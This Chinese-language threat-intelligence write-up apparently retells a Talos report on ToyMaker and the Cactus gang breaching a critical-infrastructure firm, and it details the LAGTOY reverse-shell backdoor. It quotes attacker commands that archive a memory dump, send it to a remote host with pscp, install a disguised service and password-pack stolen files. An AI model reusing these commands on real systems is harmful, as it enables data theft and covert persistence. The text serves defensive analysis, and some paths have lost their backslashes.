在当今复杂多变的网络威胁环境中,攻击者之间的合作愈发频繁,形成了更具破坏性的攻击链。2023年,思科Talos团队揭露了一起针对关键基础设施企业的联合攻击事件,攻击者通过精心策划的多阶段入侵,从初始访问逐步演变为双重勒索。本文将详细分析这一攻击链的各个环节,揭示攻击者如何利用多种工具和策略逐步渗透目标网络,最终实现其恶意目的。
-
2023年,思科Talos团队发现一家关键基础设施企业遭受了广泛的入侵,入侵者是一个由多种威胁行为者组成的联合体。 -
从初始入侵到实施双重勒索,这些行为者通过结合使用各种具有双重用途的远程管理工具、SSH工具以及文件传输工具,缓慢而稳定地入侵了该企业网络中的众多主机。
-
初始访问代理(IAB)被Talos称为“ToyMaker”,Talos对其评估的可信度为中等,这是一个以经济利益为动机的威胁行为者,他们利用暴露在互联网上的易受攻击的系统进行入侵。他们部署了我们称之为“LAGTOY”的定制后门,并从受害企业中窃取凭据。LAGTOY可以用来创建反向shell并在受感染的终端上执行命令。
-
一旦被LAGTOY入侵,可能会导致访问权限被移交给第二个威胁行为者。具体来说,Talos团队观察到ToyMaker将访问权限移交给Cactus,这是一个双重勒索团伙,他们使用自己的战术、技术与程序(TTP)在受害者的网络中实施恶意行为。
Magnet RAM Capture是一个免费的取证工具,用于获取主机的内存转储,从中可以提取凭据。这种战术可能解释了Talos在此次活动中识别出的大量受感染系统的高数量。
然后使用7za.exe归档命令T1560对内存转储进行归档:
7za.exe a -p -mmt2 -mhe 1.7z 1.r
pscp.exe -P 53 1.7z root@<Remote_IP>:/root
一旦攻击者获得内存转储,他们就会再次使用sftp-server.exe连接下载并执行我们称之为“LAGTOY”的定制反向shell植入。
LAGTOY通过创建一个服务来在系统上持久化[T1543][7]:
sc create WmiPrvSV start=auto error=ignore binPath=C:Program FilesCommon FilesServicesWmiPrvSV.exe
植入程序会联系其中配置的C2服务器,以接收在端点上执行的命令,例如:
图注:LAGTOY执行逻辑
LAGTOY旨在作为名为“WmiPrvSV”的服务在受感染的系统上运行。
C2 IP地址和协议端口均已硬编码到LAGTOY中。通信通过443端口使用原始套接字进行,而非像预期的那样在此TCP端口上使用TLS。
图注:指挥和控制通信
C2会向LAGTOY发送特定的管理代码:
-
#pt:停止服务。
-
#pd:中断当前执行链并检查服务是否已停止。如果已停止,则等待特定时间后重新连接到C2。
-
#ps:创建特定的进程/命令。
-
如果代码不以#开头,则直接在端点上执行提供的命令或进程名称。
图注:LAGTOY的命令识别逻辑
与2022年Mandiant发现的样本相比,此样本新增了#ps处理器,用于创建命令对应的进程。
图注:2022年的样本没有#ps参数
LAGTOY能够处理来自C2的三个命令,每个命令之间的休眠间隔为11000毫秒。在其信标周期内,它会记录上次C2通信和命令执行的成功时间。如果C2发出的命令至少连续30分钟失败,植入体将向C2发送一条消息,告知其命令执行失败。
LAGTOY嵌入了一个看门狗程序。如果它累计运行时间超过60分钟,它将停止执行命令,然后检查服务是否已停止。如果服务仍然处于活动状态,植入体将重新启动与C2的连接。
图注:LAGTOY的总体时间和C2通信逻辑
C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>
C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>
C:Windowssystem32cmd.exe /c <path>7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>
评论